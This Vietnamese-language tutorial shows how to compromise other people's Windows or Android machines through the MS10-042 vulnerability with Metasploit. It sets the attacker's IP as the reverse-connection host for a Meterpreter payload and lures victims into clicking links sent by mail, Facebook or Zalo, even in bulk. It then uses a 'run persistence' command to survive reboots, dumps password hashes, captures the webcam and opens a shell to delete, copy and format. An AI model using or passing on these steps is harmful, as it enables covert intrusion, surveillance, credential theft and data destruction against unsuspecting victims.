Giao diện cài đặt máy hacker: kali linux (1.09)

Dùng lệnh ifconfig để xem địa chỉ ip “hacker” ở đây địa chỉ là 192.168.1.112

Khai thác Lỗ hổng ms10_042

Thực hiện vài câu lệnh để chuẩn bị xâm nhập máy victim qua lỗ hổng:

Đặt IP của sever “srvhost” và “lhost” chính là ip của kali

Set srvhost 192.168.1.112 Set lhost 192.168.1.112

Tạo 1 payload tùy vào nền tảng OS của victim mà ta dùng, có thể là android hoặc windows, sau đó là sử dụng con sâu “meterpreter” với kết nối ngược giao thức tcp. Việc kết nối ngược này sẽ được thực hiện bởi chính victim, khi họ vô tình nhấp vào những liên kết do hacker giăng ra.

Sau đây ta sẽ quan sát hiện tượng gì khi victim vô tình nhấp vào những liên kết mà hacker gửi cho họ ( có thể qua mail, facebook, zalo…)

Đây là quá trình rình rập chờ đợi con mồi rơi vào bẫy, khi con mồi sập bẫy thì lập tức hành động

Meterpreter đã mở port 1163 và ta có thể làm việc trên port đã mở, sau đó chúng ta có thể nghịch ngợm tùy ý. Ngoài ra thì ta có thể gửi đồng loạt địa chỉ ip của hacker cho nhiều victim và chỉ cần 1 cú click chuột thì sẽ có 1 phiên kết nối, số phiên kết nối sẽ liệt kê vào cột id, dựa vào id mà ta sẽ kết nối vs victim tại thời diểm hiện tại.

Sau đó ta dùng lệnh “run persistence -S - A - U - X - i 1500 - p 8888” để victim luôn giữ liên lạc vs hacker, cho dù tắt máy, hay khởi động lại đi chăng nữa.

Thử khỏi động máy Victim lại:

Các phiên bị close , sau khi khởi động xong ta thấy có các phiên 4,5,6 tự kết nối.

Ta sử dụng lệnh help hoặc ? để biết có những lệnh gì được phép sử dụng.

Trong đó có những quyền về hệ thống, trên OS ta thường có những quyền riêng biệt dành cho guest, admin, everyone nhưng đối với hacker họ phải làm mọi cách để full quyền-18 quyền

Dùng lệnh “getprivs”

Câu lệnh cơ bản như sysinfo giúp ta xem thông tin máy hoặc đặc biệt hơn là lệnh hashdump. Câu lệnh có thể giúp ta biết password vào máy tính. Nhờ 1 bộ giải mã nào đó mà ta có thể phiên dịch ra ngôn ngữ latin, ở đây password là khoảng trắng.

,

Hoặc các bạn có thể chụp webcam của máy victim, copy file từ máy tính victim…

Hay hơn ta có thể viết các câu lệnh Dos – bạn không thể trực tiếp tạo 1 file hay làm việc trên máy victim bằng cách thủ công. Nhưng bạn có thể làm điều đó bằng Dos – ngôn ngữ tên tuổi gắn liền với Microsoft và hầu hết các bạn sử dụng máy tính đều biết đến màn hình đen thui có những chữ chạy như ma trận này.

Dùng lệnh “shell” để viết lệnh trực tiếp trên Cmd của victim.

Sau đó thực thi các lênh trong Dos như: xóa thư mục, copy file, format, shutdown..v.v